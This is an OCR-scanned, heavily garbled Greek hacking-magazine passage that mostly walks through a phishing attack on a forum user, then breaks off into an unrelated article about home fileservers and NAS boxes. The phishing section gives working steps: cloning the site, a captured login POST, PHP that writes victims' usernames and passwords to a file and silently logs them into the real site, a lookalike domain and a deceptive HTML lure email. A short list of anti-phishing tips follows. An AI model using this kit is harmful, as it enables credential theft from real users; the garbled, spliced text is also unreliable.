1. Στήσιμο ενὸς τοπικού web server. 
2. Δημιουργία ενὸς kAovou του pOwnbox, στον τοπικὀ web server. 


3. Ενσωμάτωση κὠδικα για την κλοπή rov credentials και την αυτὀ- 
µατη σύνδεση στο πραγμµατικὀ site. 


4. Ενοικίαση £vóg server, για τη φιλοξενία της εφαρµογἠς µας. 


5. Αγορά ενὸς domain name µε ὀνομα παρόμοιο µε εκείνο του 
pOwnbox, ὥστε να ξεγελαστούν οι αφηρημένοι. 


6. Апостол παραπλανητικού email στο χρήστη Thiseas, ro onoio θα 
του ζητά να διορθώσει (και καλὰ) κάποιο post. Φυσικά, στο email 
θα υπάρχει και link προς το προβληματικὀ post, το οποίο ὠστόσο 
θα παραπέμπει στο πλαστὸ site. 


O Thiseas εἶναι γνωστός για την αφηρηµάδα του. Με τα παραπάνω βή- 
рата ελπίζουμε бт! θα τον ξεγελάσουμε, ώστε να εισαγάγει τα δικἀ του 
credentials στο ψεύτικο site. To redirection που θα ακολουθήσει θα τον 
τοποθετήσει στο αληθινό pOwnbox και μάλιστα στο post για το οποίο 
kave λὀγο ro email. Αυτό θα γίνει για να περιορἰσουµε τις πιθανότητες 
να αντιληφθεί την απάτη kai να σπεύσει να αλλάξει ra στοιχεία του. Έτσι, 
θα πάρουμε ra credentials kai θα μπορούμε να μπούμε στο λογαριασμό 
TOU, στο Site. «Κλασικἠ περίπτωση impersonation», όπως θα `Аєүє κι ἑνα 
φιλαρἁκι! 


Χωρίς ἄλλες περιστροφές, ας δούμε тора, αναλυτικἀ, τα βήματα της eni- 
θεσης. 


1. Μήπως νόμισε κανεἰς От! δεν μπορούμε; Av ναι, συνεχίστε να διαβάζετε. Αν xı, συνεχίστε να διαβάζετε ;) 
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Βήμα 1 


Στἠνουµε σε ἑνα τοπικὀ μηχάνημα (ενδεχομένως και σε µια εικονικἠ µη- 
χανἠ) ro Fedora 17. Το συγκεκριµένο σύστημα θα αποτελεἰ то εργαστἠ- 
ро µας. Εκεἰ φροντίζουμε va σετάρουµε ¿vav web server kai την РНР. 


Βήμα 2 


Πηγαίνουμε στο pOwnbox.com µε τον Firefox?, επιλέγουμε File П> Save 
Page Ας, δίνουμε ως ὀνομα το index.php και ото Save as type επιλέγου- 
µε το Web Page, complete (*htm;*.html). H αποθήκευση φροντίζουμε 
να γίνει κάπου µέσα στο document root του web server. Εμεὶς φτιάξαμε 
£vav κατάλογο µε το ὀνομα .test/clopy κι αποθηκεύσαµε το pOwnbox εκεἰ 
μέσα (βλ. εικὀνα 2). 


pOwnbox * Portal - Mozilla Firefox 


File Edit View History 


| J pownbox * Portal Name: [index.php | 


Save in folder: E usr | share | nginx | html | test | аору [create Folder | 


Places Name v Size Modified 


Q search index. files 21:03 


Ὁ Recently Used 


Ø thiseas 

© Desktop 

B Fite System 

© Documents 

[55 Music 

Ë Pictures 

[ΕΙ Videos 

| Web Раде, complete $ 

Εικόνα 2 Βήμα 2.5 
Αποθηκεύουμε | | А : А : А 
ἑνα αντίγραφο του Αυτὀ το ενδιάµεσο βήμα εἶναι που θα κάνει την επἰθεσἠ µας nio npo- 
pOwnbox σε kará- χωρημένη! Στόχος µας εἶναι va βρούμε rov koóika που εκτελείται στο 
λογο *єутдс* του παρασκήνιο του pOwnbox, όταν ο χρήστης δίνει τα στοιχεία του για va 
document root του συνδεθεἰ. Αυτό µας ενδιαφἑρει, ώστε να πετύχουμε την αυτόματη σύν- 
web server µας... Əgon στο αληθινὸ site órav το θύμα εισάγει τα στοιχεία του στο πλαστὀ. 


Πα την εργασία µας θα χρησιμοποιήσουμε τον αγαπημένο µας Firefox και 
συγκεκριµένα ro addon ονόματι Live Http Headers: 


https://addons.mozilla.org/en-US/firefox/addon/live-http-headers 


Αφού ενεργοποιήσουµε ro addon, δοκιµάζουμε va κάνουμε µια εισαγωγἠ 
στο forum µε τυχαία username kai password (στο παράδειγμά µας δώσα- 
µε αντίστοιχα one και two). Στη συνέχεια καταγράφουμετο POST request 
που εκτέλεσε ο client προς rov server (βλ. εικόνα 3). 


Αυτό то POST request θα ενσωµατωθεὶ στο πλαστό site, yia την auró- 
µατη σύνδεση του θύματος στο αληθινό site. Όπως αντιλαμβάνεστε, στη 
θέση των one και two θα τοποθετούνται τα στοιχεία που δίνει το θύμα. O 
κὠδικας nou καταγράψαμε апо το αληθινό site κατὰ την απὀπειρα σύν- 
δεσης, φαίνεται παρακάτω. 


2. Αλήθεια, υπάρχει кат! ἄλλο; Νομίζουμε κάτι υπάρχει στην Αφρική, αλλά αυτό εἶναι μόνο για... Σαφάρι! 
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Headers | Generator | Config | About 


HTTP Headers 


I www.pOwnbox.com/ucp.php?mode-login 


POST /ucp.php?mode-login HTTP/1.1 | 
Host: www.pOwnbox.com | Live HTTP Replay 
User-Agent: Mozilla/5.0 (X11; Linux i686; 
Accept: text/html,application/xhtml--xmL,a 
Accept-Language: en-US, en;q-0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Referer: http://www.pOwnbox.com/ 
Cookie: __иїта=69809361.613086224. 
Content-Type: application/x-www-form-ur 
Content-Length: 77 
username-one&password-two&autolo 


POSI| x | | nttp://www.pOwnbox.com/ucp.php?mode=Login | HTTP/1.1 


HTTP Headers 


Host: www.pOwnbox.com 
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 
Firefox/17.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 


HTTP/1.1 200 OK 
Server: nainv/1 Ω 15 


Save All... | | Replay... 


М 


Send POST Content 2 


username-one&password-two&autologin-on&login- Login& 
redirect-.2Fportal.php463F 


Εικόνα 3 
Καταγραφή rou POST request Content-Length: 77 
ката τη διαδικασία του login... 


Replay | Close 


«html» 


«form id="form1" name-"form1" action-"http://www.pOwnbox.com/ucp.php?mode-login" 
method="post" target-" /» 


«input type="hidden" name-'Host" value-"www.pOwnbox.com"/» 


«input type="hidden" name-"User-Agent" value-'Mozilla/5.0 (Windows NT 6.2; WOW64; 
rv:19.0) Gecko/20100101 Firefox/19.0"/» 


«input type="hidden" name-"Accept" value-'text/html,application/ 
xhtml«exml,application/xml;q-0.9,*/*;q9-0.8"/» 

«input type="hidden" name-"Accept-Language" value-"en-US,en;q-0.5"/» 
«input type="hidden" name-"Accept-Encoding" value-'gzip, deflate"/» 


«input type="hidden" name-"Referer" value-'http://www.pOwnbox.com/index.php?sid-b7e 
8a330f7fb479f6475c7d5792471fb"/» 


«input type="hidden" name-"Cookie" value-" utma-69809361.1026857499.1360495477 
.1361478852.1361553179.17; _ utmz-69809361.1360495477.1.1.utmcsr-(direct)|utm 
ccn-(direct)|utmcmd-(none); ^ utmc-69809361; _ utmb-69809361.3.10.1361553179; 
phpbb3 7yskx u-1; phpbb3 7yskx ΚΞ; phpbb3 7yskx sid-b7e8a330f7fb479f6475c7d457924 
71{5"/» 


<input type="hidden" name="Connection" value="keep-alive"/> 
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<input type="hidden" name="Content-Type" value="application/x-www-form- 
urlencoded"/> 


<input type="hidden" name="Content-Length" value="96"/> 
<input type="hidden" name="username" value="one"/> 
<input type="hidden" name="password" value="two"/> 
<input type="hidden" name="autologin" value="on"/> 


<input type="hidden" name="login" value="Login"/> 


<input type="hidden" name="redirect" value="./portal.php"/> 
</form> 
<script type="text/javascript"> 


document.form1.submit(); 


«/script» 
«/html» 
Βήμα 3 
Тора πρέπει va τροποποιήσουμε τον κὠδικα του κλώνου (nou κατεβάσα- 
µε στο βήμα 2), ὥστε отау ο χρήστης δίνει username και password αυτά 
να καταχωρούνται σε ἑνα αρχείο κι αµέσως μετά να εκτελεἰται ο κὠδικας 
του βήματος 2.5! Αν επισκεφθούμε τον κλὠνο (ronikà), θα δούμε κάτι 
σαν αυτό που φαίνεται στην εικόνα 4. 
Όπως βλέπετε, ο εκάστοτε χρήστης μπορεἰ να κάνει login апо δύο nepi- 
οχἐς. Προφανώς, ἑνας απατεώνας θα φρόντιζε να παρέμβει και στις δύο! 
: Πα οικονομία λόγου (και χώρου στο περιοδικὀ) θα δείξουμε την επἐµβαση 
Εικόνα 4 ' N А ' ‚ М А Y 
O κλώνος του μόνο στη μία περιοχή, αφού και στην ἄλλη δεν αλλάζει τίποτα eni της 
p0wnbox... ουσίας. 


pOwnbox » Portal - Mozilla Firefox 
File Edit View History Bookmarks Tools Help 
| Q pOwnbox * Portal Lel 


@ | @ localhost/test м 3] EN returnURL а ” v 


Portal Board index Register 


ΕΙ Loa те оп automaticaly each vi 


Welcome Message 


Latest news 
ecc 

οι TS Replies 
Ө 1-0 u 
Ө эсу рок 


ng – Man in the Middle 


ff Birthdays 
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[Ξε] «div style-"float:left;"» 


= «form name="forml" action="index.php?mode=login" method-"post"» 

5 <table class="toplogin" style-"width:1000px;" cellpadding="0" 
E <tbody><tr> 

<td><span class="gensmall">Username:</span></td> 
«td»«input class-"post" id-"username" name-"username" 
«td»«span class-"gensmall"-Password:c/span»c/td- 


«td nowrap-"nowrap"»«input class-"post" name-"passwor 


Εικόνα 5 
Hi H πρώτη αλλαγή <td><input checked="checked" class="radio" name="auto 
Ë στον πλαστό «span style="vertical-align: middle;" class-"gensmall 
κλώνο εντοπίζεται <td><input class-"btnmain" name-"login" value-"Login" 
| ото form action... </tr> 


Γ </tbody></table> 


Ὅπως φαίνεται στην εικόνα 5, το прото праүна που αλλάζουμε στον 
κὠδικα εἶναι στη φόρμα εισαγωγἠς: Φροντίζουμε ὡστε ro form action 
(η ενέργεια που εκτελείται όταν πατιέται το submit button 0 στην πε- 
ρἰπτωσή µας ro login button) va калі τον εαυτό της! Αυτό θα ἐχει σαν 
συνέπεια να стал! η σελἰδα στον server µε τις τιμές του username και 
TOU password που έχει δώσει ο χρήστης. Αυτὴή τη фора, ὁμως, η na- 
ράμετρος mode (της μεθόδου GET) θα ἐχει την τιμή login. H τιµή της 
συγκεκριμένης παραμέτρου εἶναι αδιάφορη για τον server. Ωστόσο, µας 
ενδιαφἑρει va την ορίσουμε επειδἠ έτσι συμπεριφέρεται και το γνήσιο 
site. Ουσιαστικά, auró που θέλουμε εἶναι να οριστεἰ (µε κάποια τιμὴ) η 
μεταβλητἠ mode. H ὑπαρξη αυτἠς της μεταβλητής στο URL αποτελεί µια 
ἐνδειξη του λεγόμενου postback. Σημαίνει δηλαδὴ бт! ο χρήστης πάτησε 
το login button. Αναρωτιέστε γιατὶ µας ενδιαφἑρει να ξέρουμε το αν ἐχει 
πατηθεί ro κουμπὶ ἡ ὀχι; Στην αρχἠ της σελίδας µας (rou index.php) θα 
βάλουμε κὠδικα, ο οποίος θα ελέγχει αν ἐχει οριστεί η μεταβλητή mode. 
Σε αυτή την περίπτωση, o κὠδικας θα συμπεραίνει От! ἐχει πατηθεἰ το 
κουμπί login και θα καταγράφει ra credentials του χρήστη. Επιπρόσθετα, 
το ἰδιο κομμάτι κὠδικα θα πραγματοποιεί το login και στο αληθινό site. О 
κὠδικας που τοποθετήσαμε στην κορυφὴ του αρχείου index.php φαίνεται 
παρακάτω. 


<?php 

if (isset($_GET['mode'])) í 
// KAAEXE ΤΟΝ ΚΩΔΙΚΑ ΤΗΣ ΠΑΡΑΓΡΑΦΟΥ 2.1 ME TA CREDENTIALS ΤΟΥ ΘΥΜΑΤΟΣ 
$c = «html» 


«form іа="Ғогт1" name-"form1" action-'http://www.pOwnbox.com/ucp. 
php?mode-login" method-"post" target-" /» 


«input type="hidden" name-'"Host" value-"www.pOwnbox. сот"/ > 


«input type="hidden" name-"User-Agent" value-'Mozilla/5.0 (Windows NT 6.2; 
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"/» 


«input type="hidden" name-"Accept" value-"text/html,application/ 
xhtml«xml,application/xml;q-0.9,*/*;9-0.8"/» 


«input type="hidden" name-"Accept-Language" value-"en-US,en;q-0.5"/» 
«input type="hidden" name-"Accept-Encoding" value-"gzip, deflate"/» 


«input type="hidden" name-"Referer" value-"http://www.pOwnbox.com/index.php?s 
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id=b7e8a330f7fb479f6475c7d5792471fb"/> 


<input type="hidden" name="Cookie" value=" utma-69809361.1026857499 

. 1360495477 . 1361478852 .1361553179.17; _ utmz-69809361.1360495477.1 
.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ^ utmc-69809361; 

. utmb-69809361.3.10.1361553179; phpbb3 7yskx u-1; phpbb3 7yskx k-; 
phpbb3 7yskx sid-b7e8a330f7fb479f6475c7d45792471fb"/» 


«input type="hidden" name-"Connection" value-"keep-alive"/» 


«input type="hidden" name-"Content-Type" value-"application/x-www-fonrm- 
urlencoded"/» 


«input type="hidden" name-"Content-Length" value-"96"/» 
«input type="hidden" name-"username" value-".$ POST['username']."/» 
«input type="hidden" name-"password" value-".$ POST['password']."/» 
«input type="hidden" name-"autologin" value-"on"/» 
«input type="hidden" name-"login" value-"Login"/» 
«input type="hidden" name-'"redirect" value-"./viewtopic.php?f-15&t-5"/» 
«/form» 
«script type-"text/javascript'» 
document.form1.submit(); 
«/script» 
«/html»'; 
echo $c; 
// ПАРЕ TA CREDENTIALS TOY ΘΥΜΑΤΟΣ 
$credentials = $ POST['username'].':'.$ POST['password']; 


// ГРАФЕ TA CREDENTIALS ΣΕ ΕΝΑ ΤΟΠΙΚΟ ΑΡΧΕΙΟ (το kappa.txt) ΣΤΟΝ KAKOBOYAO 
SERVER 


$txtfile = fopen('kapa.txt', 'а'); 


fwrite($txtfile, '— Credentials 


\n"); 

fwrite($txtfile, $credentials . "\n"); 

fwrite($txtfile, "———-\n"); 

fclose($txtfile); 

// ΕΠΕΣΤΡΕΨΕ. O ΧΡΗΣΤΗΣ ΕΙΝΑΙ ΗΔΗ ΣΤΟ ΓΝΗΣΙΟ SITE, ΛΟΓΩ TOY SUBMIT ΤΗΣ 
// ΦΟΡΜΑΣ ΠΟΥ ΓΙΝΕΤΑΙ ECHO ΜΕΣΑ ΑΠΟ ΤΗΝ ΜΕΤΑΒΛΗΤΗ $c (λίγο παραπάνω) 


return; 
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Νομίζουμε бт! µε τη βοήθεια των σχολἰων, κάποιος που γνωρίζει στοιχει- 
«Qoo PHP θα κατανοήσει πλήρως rov κὠδικα. Σε σχέση µε rov κὠδικα 
του βήματος 2.5, προσθέσαµε τα ακόλουθα (κὀκκινα σε γκρι φόντο): 


Βήμα 4 


Επισκεπτόµαστε κάποιον hosting provider, παίρνουμε τον ελάχιστο δυνα- 
τὸ χώρο (συνήθως εἶναι δωρεάν) κι ανεβάζουμε την εφαρμογὴ µας εκεἰ... 


Βήμα5 


Ερχόμαστε στην αγορά του domain name. Μια καλή ιδέα εἶναι να πάμε 
σε κάποιον domain name host, ο οποίος να παρέχει και δωρεάν Φιλο- 
ξενία (υπάρχουν пара πολλοί, ὅπως οι tophost.gr, ip.gr, domains24.gr 
к.а.) ὥστε να συνδυάσουµε το 4ο kai το 50 βήμα! Φυσικά, η επιλογἠ του 
domain name πρέπει να γίνει µε προσοχή. To буора για το ψεύτικο site 
πρέπει να μοιάζει µε αυτὀ του pOwnbox.com. Πα παράδειγµα, θα μπορού- 
caue να αγοράσουμε το pownbox.com, ónou στην θέση «0» έχουμε βάλει 
ἑνα «o». Μια άλλη λύση εἶναι να αλλάξουμε µόνο το top level domain. О! 
χρήστες nou θα παρατηρούσαν µια τέτοια αλλαγή εἶναι ελάχιστοι! Έτσι, 
θα μπορούσαμε να πάρουμε ro pOwnbox.gr. Μετά την αγορά, απομένει η 
σύνδεση της εφαρµογἠς µας µε το νεοαποκτηθὲν domain. 


Βήμα 6 


Σε αυτὸ το σηµείο η υποδομή για την απάτη ἐχει ολοκληρωθεί. Τώρα 
στἐλνουµε éva email στον Thiseas και του λέμε ὁτι υπάρχει πρόβλημα 
µε κάποιο συγκεκριµένο post, το οποίο θα πρέπει να διευθετήσει. Μάλι- 
στα, για να τον διευκολύνουμε δήθεν, του προσφέρουμε ἑνα link просто 
συγκεκριµένο post. Φυσικά, то link δεν θα παραπέμπει στον πραγµατικὀ 
server αλλά στον δικὀ µας! Μάλιστα, για να то κάνουμε ακόµα πιο δύσκο- 
^o, TO email θα εἶναι σε HTML και ὀχι σε plain text. Έτσι, το URL του link 
δεν θα εἶναι ἄμεσα орато. Μια πιθανἠ εκδοχἠ του email εἶναι η ακὀλουθη 
(βλ. εικόνα 6). 


<html> 


<meta http-equiv="Content-Type" content="text/html;charset=utf-8"> 


Αγαπητέ Thiseas γεια χαρά! 


Είστε τόσο καλός кол τρομερός кол... blah blah blah.. γλυψ, γλυψ, γλυψ.. 


Νομίζω όμως οτι υπάρχει ένα λάθος στο post που κάνατε στο p@wnbox και πιο 
συγκεκριµένα σε αυτό «a hrefz'http: //www.pOwnbox.gr"»£60«/a». 


Στην διάθεση σας για οποιαδήποτε διευκρίνηση. 


Ο καλός σας... δαίµονας 


Mr Clipper Autumn 86 ;) 


</html> 


УНА 
V HAGKER 
ΧΧΧ ΧΧΧ ΧΧΧ ΧΧΧ 
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T] Διαγραφή Ф е = Μετακίνηση. © spam Еуёрүғес̧ ~ 


Ἕνα λάθος σε κάποιο post σας... 


Атгб 


Прос 


Αγαπητέ Thiseas γεια хара! 


Εἰστετόσο καλός και τρομερός kai τόσο hacker και και και... bla bla bla bla 
Duy, Γλυψ, Γλυψ, Γλυψ, uy, Γλυψ, Γλυψ, Γλυψ. 


Νομίζω ὅμως οτι υπάρχει éva αρκετά σοβαρό λᾶθος στο post rou κάνατε στο p0wnbox ко πιο συγκεκριµένα σε αυτό εδώ. 


Στην διάθεση σας για отто 


O καλός σας... δαίμονας 


ιαδήποτε διευκρίνηση. 


Mr Clipper Autumn 86 ;-) 


Εικόνα 6 

Γειά σου αγαπητέ 
Thiseas. Πόσο 
προσεκτικός εἰσαι 


σήμερα; 


Εικόνα 7 
Hello Thiseas... 


To email που φαίνεται παραπάνω εἶναι αρκετἀ παραπλανητικὀ, αλλά θα 
μπορούσε να γίνει καλύτερο. Τοποθετώντας το ποντίκι πάνω στη λέξη 
«E00», ο Thiesas θα δει τον προορισμό του link κι ενδέχεται να εντοπίσει 
την απάτη. Па να κάνουμε ακόμα πιο ὑπουλο το link, θα μπορούσαμε 
va μετονομάσουμε το index.php του δικού µας site σε viewtopic.php. 
Επιπρόσθετα, θα μπορούσαμε va ενσωματώσουμε στο URL μερικὲς na- 
ραμέτρους σαν αυτές: <f=15&t=5>. Αυτές οι παράμετροι θα αγνοούνταν 
απὀ ro site και η προσθήκη τους δεν θα δημιουργούσε κανένα πρὀβλη- 
μα! Τελικά, το link εντὸς rou email θα μπορούσε va ἐχει την ακόλουθη 
µορφή: <www.p0wnbox.gr/viewtopic.php?f=15&t=5>. Όπως αντιλαμβά- 
νεστε, ἑστω και λίγο αφηρηµένος να ἦταν ο Thiseas, θα ἦταν σχεδὸν 
απίθανο να παρατηρήσει το <.gr> στη θέση του «.com» και θα πάταγε το 
link xopic δεύτερη σκέψη. 


pOwnbox * View topic - Buffer Overflow ll - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 
© pownbox * View topic - Buffer ... | + | 


@ | pOwnbox.com/viewt php?f- t= d=97de8ee! f e6df4 MƏ μὰν Qj y 


NEW TOPIC REPLY 


Author 
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Logout [ Thiseas ] 


SEARCH MEMBERS PROFILE 5 ACP 
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H εξέλιξη 


Μετά την επἱσκειμὴ στο ψεύτικο site, o Thiseas θα ἐδινε username ка! 
password κι o κὠδικάς µας θα rov συνέδεε στο αληθινὸ site (βλ. εικόνα 7). 


Βέβαια, ὁπως εἶδαμε και νωρίτερα, o κὠδικας θα φρόντιζε και για кайт! 
ακόµα: Πα την αποθήκευση rov credentials του Thiseas (βλ. εικόνα 8). 


root@fedora:/usr/share/nginx/html/test/clopy 


File Edit View Search Terminal Help 


Αντιμετώπιση 


Μερικά απλά µέτρα yia να αποφεύγουμε τις απάτες αυτού του εἶδους, 
εἶναι τα ακόλουθα: 


1. Na µην ακολουθούμε κανένα link апо ra email που µας στέλνουν 


2. Αν δεν μπορούμε va κἀνουμετο 1, να ελέγχουμε πάντα κι ενδελε- 
xoc τον προορισμὀ των links. 


3. Ма µην έχουμε каша εμπιστοσύνη στο ὀνομα του αποστολέα που 
αναφἑρεται στο email. Αυτό αλλάζει πολύ εὐκολα, апо κάποιον 


πονηρό χρήστη! 


4. Σε µια κρυπτογραφημένη σύνδεση υπάρχει ο κἰνδυνος va ἐχει 
αγοραστεἰ апо τον επιτιθἐµενο va SSL certificate, ὥστε TO ψεύ- 
TIKO site va προσφέρεται µέσω HTTPS και να εἰναι ακόµα πιο πει- 
στικὀ. Σε αυτὲς τις περιπτώσεις εἶναι φρόνιμο να κάνουμε View 
Certificate και va επιβεβαιώνουμε ὁτι το πιστοποιητικὀ αναφέρεται 
στο αναμενόμενο πρόσωπο (βλ. εικὀνα 9). 


€ > 4 
82 Google Translati 
| | 


(GR) h 


EMPORIKI BANK OF GREECE S... 


A = You are connected to 
WA emporiki.gr 
d which is run by 


EMPORIKI BANK OF GREECE S.A. 


ATHENS 
ATTIKA, GR 


Εικόνα 8 
Bye bye Thiseas... 


Εικὀνα 9 

Όταν ἐχετε την na- 
ραμικρή αμφιβολία 
ñ υποψία, ακόµα 
ΚΙ όταν η σύνδεση 
εἶναι HTTPS va 
ελέγχετε *návra* 
το Certificate! 


ebank.emporiki.gr/EMPB EBANKWeb2 


kc Purchases L} R&D |} 


Verified by: VeriSign, Inc. la T€ ! 


a Your connection to this website is encrypted to 
prevent eavesdropping. 


= кш TrpayporoTroiñorTz τις 
More Information... | гс καὶ φιλικό ττεριβάλλον 


Eurropikfic Τράπτεζας. 


 Aekrpovikr]c τραττεζικἠς της 
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Μπορεί στο εξώφυλλο του τεύχους о DTP Guy тпс Parabing Creations! 
να δημιούργησε µια εντυπωσιακή, 100% καλλιτεχνικἠ απεικόνιση 
του ιδανικού fileserver, єнєїс ωστόσο δεν εἰμαστε διατεθειμένοι 
να κυνηγήσουμε το τρελὀ ὀνειρο της απὀκτησης ενός ανάλογου 
μηχανήματος. Δεν σας κρύβουμε, ωστόσο, Ori την ἰδια στιγμή το όλο θέμα 
εἶναι διαρκώς στο μυαλό µας και µας τριβελἰζει. Στο napóv άρθρο θέλουμε 
να μοιραστούμε μαζὶ σας μερικὲς σκέψεις, καθὼς και να παρουσιάσουμε 
ορισμένες λύσεις για µια υποπερίπτωση του προβλήματος Απόλυτος File- 
server (TM). Και μιλάμε για υποπερίπτωση, αφού οι προτεινόμενες λύσεις 
αφορούν σε boxes που προορἰζονται yia οικιακἠ χρήση, аут και για µια 
μικρή εταιρεἰα. 


Διάφορα που ακούμε, απ’ £60 κι απὸ "kei 


O μεσόὀτιτλος δεν εἶναι καθόλου υποτιµητικὀς. Πράγματι, δεν υπάρχει 
κάποιος που να µην ἐχει σκεφτεί, ἑστω και μία φορά, το τι θα του 
προσέφερε ἑνας fileserver, στο σπίτι ἡ στο γραφείο. 


Ορισμένοι, ог οποίοι ἐχουν εμπειρία κυρίως апо Windows, 
προσανατολἰζονται σε éva μηχάνημα που θα τρέχει Windows XP ἡ 7 
και θα μοιράζει φακέλους ἠ/και ἑναν εκτυπωτή, στους χρήστες του 
τοπικού δικτύου. Το μηχάνημα θα χει ἐναν ἡ δύο εσωτερικούς δίσκους, 
άντε και κανέναν εξωτερικὀ σε USB. Περιττό να πούμε ὁτι δεν θα "vai 
κι ὀ,τι πιο καινούργιο, апо πλευράς hardware. Κάθε ἀλλο μάλιστα, ¿vag 
τέτοιος fileserver αποτελεὶ ἑναν anó τους τρόπους yia να συνεχίσουμε 
ν΄’ αξιοποιούμε σχετικἀ παλιὸ hardware. Αυτή η προσέγγιση θα λέγαμε 
бт! εἶναι κοντά στο Èva акро του φάσματος των λύσεων. Δεν εἶναι κακή, 
αρκεἰ να ξέρεις τι θέλεις. 


Στο ἆλλο акро υπάρχουν εκεἰνοι που ονειρεύονται λύσεις του στιλ rack- 
mountable servers (βλ., N.X., www.system76.com/servers/mode1/jacv4). Και 
μη νομίζετε ότι μιλάμε yia system administrators σε μεγάλες εταιρείες! 
Τις προάλλες, αναγνώστης του περιοδικού µας έλεγε στο twitter ὁτι 
σκέφτεται µια παρόμοια εγκατάσταση yia την αποθήκη του σπιτιού. 


Εμείς, πάλι, σκεφτόμαστε λύσεις µακριά апо τα ákpa. Αλλά πριν σας πούμε 
τι έχουμε κατὰ vou, εἶναι καλύτερα να παραθἑσουµε τα ҳарактпріотіка 
που πιστεύουμε ὁτι πρέπει να ἐχει ο ιδανικὀς fileserver. 


Οι ελάχιστες επιθυμητὲς ιδιότητες 


H πρώτη που µας ἐρχεται στο μυαλὸ ἐχει να κάνει µε την οικονομία ἡ 
ακριβέστερα την εξοικονόμηση. Δεν θέλουμε ἑνα μηχάνημα µε ισχύ που 
θα περισσεύει και θα φουσκώνει ἁδικα το λογαριασμὀ του ηλεκτρικού. 
Στην πλειονότητα των περιπτώσεων, ¿va σύστημα µε επεξεργαστή Atom, 
Core 2 Duo ἡ το πολύ Core i3, εἶναι ὁ,τι πρέπει. Σε αρκετὰ sites παρέχονται 
calculators yia τον υπολογισμό της ισχύος του τροφοδοτικού ενὸς PC, 
ανάλογα µε ro hardware που περιλαμβάνει. Αν λοιπὀν σκέφτεστε va 
φτιάξετε το δικὀ σας box, κάντε αν εἶναι και τους σχετικούς υπολογισμούς 
για το τροφοδοτικὀ (βλ., π.χ., www.thermaltake.outervision.com). Na 
προσθέσουμε εδώ πως αν το μηχάνημα θα βρἰσκεται σε ἠσυχο εργασιακὀ 
περιβάλλον, τότε бсо nio αθόρυβο εἰναι, τόσο то καλύτερο. Αν φτιάχνετε 
ἑνα PC anó την αρχἠ, ευτυχώς εἶναι εὐκολο να επιλέξετε αθὀρυβους 
ανεμιστήρες yia τη CPU και το εσωτερικὀ TOU κουτιού. 


Εξάλλου, кат! ἆλλο ακόµα που ενδέχεται να βοηθήσει στις συνολικὲς 


1. Н µικρή, ανεξάρτητη εκδοτική πίσω апо то deltaHacker. 


Υπάρχει ο απόλυτας File Server? 
ια 


[!!] Partition disks 


The installer can guide you through partitioning a disk (using different standard 
schemes) or, if you prefer, uou can do it manually. Hith guided partitioning uou will 
still have a chance later to review and customise the results. 


If you choose guided partitioning for an entire disk, you will next be asked which disk 
should be used. 


Partitioning method: 


Guided - use entire disk 


Guided - use entire disk and set ra LVM 


Manual 


«80 Back» 


selects; «Enter» acti 


επιδόσεις του fileserver, εἶναι η ποσότητα της μνήμης. Ειδικἁ αν το 
μηχάνημα θα βασίζεται στο ZFS (βλ. συνέχεια), τότε боп περισσότερη 
εἶναι η μνήμη, τόσο το καλύτερο. Προτείνουμε τουλάχιστον 4GB RAM για 
ἑναν ZFS-fileserver, αν ωστόσο ακολουθήσετε την οδὀ του Linux τότε 
άνετα θα µπορείτε να ξεκινήσετε κι апо 512MB RAM. Το ευτύχημα µε τη 
μνήμη RAM εἶναι το xaunAó της κόστος. Ενδεικτικἆ, τα 8GB RAM τύπου 
DDR3 κοστίζουν λἰγο περισσότερο απὀ 50 ευρώ. 


Τέλος, εξαιρετικἁ σηµαντικἀ χαρακτηριστικἁ εἶναι η επεκτασιµότητα, 
η αδιάλειπτη λειτουργία σε περίπτωση βλάβης κἀποιου δίσκου, καθὼς 
και η διασφάλιση των δεδομένων. Το πρῶτο, η επεκτασιµότητα, 
σημαίνει бт! το KOUTI ἐχει τις θέσεις WOTE να δεχτεί νέους δίσκους στο 
μέλλον. H αδιάλειπτη λειτουργία, καθὼς και η προστασία των δεδοµένων 
παρέχονται απὸ το hardware και συγκεκριµένα απὀ την παρουσία 
UPS αλλὰ και του κατάλληλου RAID controller στο σύστημα. Ωστόσο 
ακόµη και χωρίς αυτά, ὅταν χρησιμοποιείται ο κατάλληλος συνδυασμὸς 
λειτουργικού ouonHaqrToc-filesystem τα δεδοµένα µας παραμένουν 
ασφαλἠ και προστατευμένα. Ναι, πάλι το ZFS (και το RAID-Z) έχουμε 
κατά νου :) 


Ἔτοιμες λύσεις 


Για όσους δεν xouv τη διάθεση ἡ το χρόνο να φτιάξουν τον δικὀ τους 
fileserver, μπορούν να στραφούν σε μία ἑτοιμη λύση NAS (Network 
Attached Storage). H NetGear, για παράδειγµα, διαθέτει τη σειρἀ Rea- 
dyNAS 100 που αποτελείται апо σχετικἁ φθηνές προτάσεις. Τα μικρὰ, 
συµπαγἡ αυτά boxes δέχονται апо δύο ἑως τέσσερεις δίσκους και φυσικά 
µπορείτε να ξεκινήσετε апо ἑναν δίσκο και να προσθέτετε σύμφωνα µε 
τιςτρέχουσες ανάγκες (www.netgear.com/home/products/storage/prosumer/ 
default.aspx). Δείτε επίσης kai τις προτάσεις апо την drobo (προτείνουμε 
το drobo 5N, www.drobo.com/products/professionals/drobo-5n/index. 
php). Τα drobo δεν εἶναι апо ra πιο φθηνά NAS για οικιακἠ χρήση, ¿xouv 
ωστόσο µια δυνατότητα που, ο γράφων τουλάχιστον, δεν ἐχει δει σε ἄλλα 
NAS και τη βρίσκει πολύ ενδιαφέρουσα: Μπορεἰτε να ξεκινήσετε апо ¿vav 
δίσκο, στην πορεία κι ανάλογα µε τις ανάγκες να προσθέτετε δίσκους 
*onoiacórjnore* χωρητικότητας, ο συνολικὸς αποθηκευτικὀς χώρος va 
μεγαλώνει και την ἴδια στιγμή va ἐχετε *kar* redundancy! Πα να δείτε 


'Нбп апд τα πρώτα 
στάδια της єүката- 
στασης, το Ubuntu 
Server παρέχει την 
επιλογή για ἑνα 
LVM-based σύστη- 
μα µε ταυτόχρονη 
υποστήριξη κρυ- 
πτογράφησης. 
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Nnnn 


nog διαμορφώνεται ο συνολικός 
διαθέσιμος χώρος µε βάση ro 
System Selection πλήθος και τις χωρητικότητες TOV 


